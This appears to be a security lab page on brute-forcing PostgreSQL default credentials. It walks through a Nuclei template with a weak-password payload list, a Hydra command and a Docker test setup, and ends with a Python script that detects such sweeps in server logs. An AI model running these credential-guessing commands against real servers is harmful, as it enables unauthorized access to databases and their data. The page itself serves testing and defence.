PostgreSQL services configured with default or weak credentials present a significant security risk. Attackers can exploit these misconfigurations to gain unauthorized access, extract sensitive data, modify records, or execute arbitrary SQL commands.
- PostgreSQL Password Authentication
- PostgreSQL Authentication Documentation
- Common Default PostgreSQL Credentials
- Execute the following commands to start a PostgreSQL server
docker-compose up -d
Once the server starts, PostgreSQL will be accessible on port 5432 with default credentials (postgres:postgres).
- Brute-Force Authentication using Hydra with common credentials
hydra -C <wordlist> <target-ip> postgres
Pre-Condition Check
pre-condition: |
  var m = require("nuclei/postgres");
  var c = m.PGClient();
  c.IsPostgres(Host, Port);
- Ensures the PostgreSQL service is running before attempting authentication.
JavaScript Execution Block
code: |
  var m = require("nuclei/postgres");
  // Same client constructor as in the pre-condition block.
  var c = m.PGClient();
  c.Connect(Host, Port, User, Pass);
- Loads the PostgreSQL module for Nuclei.
- Initializes a PostgreSQL client.
- Attempts to authenticate using various username and password combinations.
Define Target Arguments
args:
  Host: "{{Host}}"
  Port: "5432"
  User: "{{usernames}}"
  Pass: "{{passwords}}"
- Specifies the target host and PostgreSQL service port (default: 5432).
- Uses a predefined list of common usernames and passwords.
Attack Mode
attack: clusterbomb
- This mode systematically tests all combinations of usernames and passwords.
Payloads
payloads:
  usernames:
    - "postgres"
    - "admin"
  passwords:
    - "password"
    - "secret"
    - "admin"
    - "postgres"
- Uses commonly found weak credentials.
Stopping Execution on First Match
stop-at-first-match: true
- Terminates the scan once valid credentials are discovered.
Nuclei Template URL: postgres-default-logins
nuclei -id postgres-default-logins -u localhost -vv
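On the server side, a clusterbomb run like the one above shows up as a burst of failed logins from one client across several usernames, sometimes ending in a successful connection. The following is an added detection example, not part of the original page or of the Nuclei project; it assumes `log_connections = on` and `log_line_prefix = '%m [%p] %h '`, and the sample lines, addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log. Assumes log_connections = on and
# log_line_prefix = '%m [%p] %h ' so every line carries the client address.
SAMPLE_LOG = '''\
2024-05-01 10:00:01.101 UTC [301] 10.0.0.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.240 UTC [302] 10.0.0.7 FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.377 UTC [303] 10.0.0.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.502 UTC [304] 10.0.0.7 FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.655 UTC [305] 10.0.0.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.790 UTC [306] 10.0.0.7 FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.931 UTC [307] 10.0.0.7 LOG:  connection authorized: user=postgres database=postgres
2024-05-01 10:03:12.004 UTC [410] 10.0.0.20 FATAL:  password authentication failed for user "app"
2024-05-01 10:03:20.519 UTC [411] 10.0.0.20 LOG:  connection authorized: user=app database=appdb
'''

LINE = re.compile(r'^\S+ \S+ \S+ \[\d+\] (?P<host>\S+) (?P<level>FATAL|LOG):\s+(?P<msg>.*)$')
FAILED = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
AUTHORIZED = re.compile(r'connection authorized: user=(?P<user>\S+)')

def find_credential_guessing(log_text, min_failures=5, min_users=2):
    """Return {host: report} for clients whose failures look like a user/password sweep."""
    failures = defaultdict(list)   # host -> usernames of failed attempts, in order
    success_after = {}             # host -> first user authorized after a failure
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        host, msg = m["host"], m["msg"]
        if (f := FAILED.search(msg)):
            failures[host].append(f["user"])
        elif (a := AUTHORIZED.search(msg)) and failures.get(host) and host not in success_after:
            success_after[host] = a["user"]
    report = {}
    for host, users in failures.items():
        # Many failures spread over several usernames: sweep, not a mistyped password.
        if len(users) >= min_failures and len(set(users)) >= min_users:
            report[host] = {"failures": len(users), "users": sorted(set(users)),
                            "login_after_failures": success_after.get(host)}
    return report

if __name__ == "__main__":
    for host, info in find_credential_guessing(SAMPLE_LOG).items():
        print(host, info)
```

A non-empty `login_after_failures` means the sweep ended with a working credential, so that account's password should be rotated and its session activity reviewed.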